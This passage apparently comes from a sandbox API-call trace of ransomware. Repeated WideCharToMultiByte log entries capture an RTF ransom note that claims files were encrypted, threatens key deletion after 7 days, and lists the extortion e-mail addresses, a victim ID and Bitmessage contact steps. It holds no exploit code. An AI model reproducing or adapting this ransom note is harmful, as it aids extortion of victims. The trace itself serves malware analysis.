fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.530] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x72efb8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 